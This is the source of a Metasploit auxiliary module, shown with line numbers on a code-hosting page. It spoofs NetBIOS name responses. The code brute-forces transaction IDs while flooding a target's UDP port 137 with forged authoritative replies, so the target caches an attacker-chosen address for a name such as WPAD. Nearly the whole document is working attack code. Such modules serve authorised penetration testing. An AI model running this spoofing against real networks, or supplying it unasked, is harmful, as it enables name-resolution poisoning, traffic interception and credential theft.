Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::Udp
8

9
  def initialize
10
    super(
11
      'Name'        => 'NetBIOS Response Brute Force Spoof (Direct)',
12
      'Description'    => %q{
13
          This module continuously spams NetBIOS responses to a target for given hostname,
14
        causing the target to cache a malicious address for this name. On high-speed local
15
        networks, the PPSRATE value should be increased to speed up this attack. As an
16
        example, a value of around 30,000 is almost 100% successful when spoofing a
17
        response for a 'WPAD' lookup. Distant targets may require more time and lower
18
        rates for a successful attack.
19
      },
20
      'Author'     => [
21
        'vvalien',   # Metasploit Module (post)
22
        'hdm',       # Metasploit Module
23
        'tombkeeper' # Related Work
24
      ],
25
      'License'     => MSF_LICENSE,
26
    )
27

28
    register_options(
29
      [
30
        Opt::RPORT(137),
31
        OptString.new('NBNAME',   [ true, "The NetBIOS name to spoof a reply for", 'WPAD' ]),
32
        OptAddress.new('NBADDR',  [ true, "The address that the NetBIOS name should resolve to", Rex::Socket.source_address("50.50.50.50") ]),
33
        OptInt.new('PPSRATE',     [ true, "The rate at which to send NetBIOS replies", 1_000])
34
      ],
35
      self.class
36
    )
37
  end
38

39
  def netbios_spam
40
    payload =
41
        "\xff\xff"   + # TX ID (will brute force this)
42
        "\x85\x00"   + # Flags = response + authoritative + recursion desired
43
        "\x00\x00"   + # Questions = 0
44
        "\x00\x01"   + # Answer RRs = 1
45
        "\x00\x00"   + # Authority RRs = 0
46
        "\x00\x00"   + # Additional RRs = 0
47
        "\x20"       +
48
        Rex::Proto::SMB::Utils.nbname_encode( [@fake_name.upcase].pack("A15") + "\x00" ) +
49
        "\x00"       +
50
        "\x00\x20"   + # Type = NB
51
        "\x00\x01"   + # Class = IN
52
        "\x00\x04\x93\xe0" + # TTL long time
53
        "\x00\x06"   + # Datalength = 6
54
        "\x00\x00"   + # Flags B-node, unique
55
        Rex::Socket.addr_aton(@fake_addr)
56

57
    stime = Time.now.to_f
58
    pcnt = 0
59
    pps  = 0
60

61
    print_status("Spamming NetBIOS responses for #{@fake_name}/#{@fake_addr} to #{@targ_addr}:#{@targ_port} at #{@targ_rate}/pps...")
62

63
    live = true
64
    while live
65
      0.upto(65535) do |txid|
66
        begin
67
          payload[0,2] = [txid].pack("n")
68
          @sock.put(payload)
69
          pcnt += 1
70

71
          pps = (pcnt / (Time.now.to_f - stime)).to_i
72
          if pps > @targ_rate
73
            sleep(0.01)
74
          end
75
        rescue Errno::ECONNREFUSED
76
          print_error("Error: Target sent us an ICMP port unreachable, port is likely closed")
77
          live = false
78
          break
79
        end
80
      end
81
    end
82

83
    print_status("Cleaning up...")
84
  end
85

86
  def run
87
    connect_udp
88
    @sock = self.udp_sock
89

90
    @targ_addr = rhost
91
    @targ_port = rport
92
    @targ_rate = datastore['PPSRATE']
93
    @fake_name = datastore['NBNAME']
94
    @fake_addr = datastore['NBADDR']
95

96
    netbios_spam
97

98
    disconnect_udp
99
  end
100
end
101

102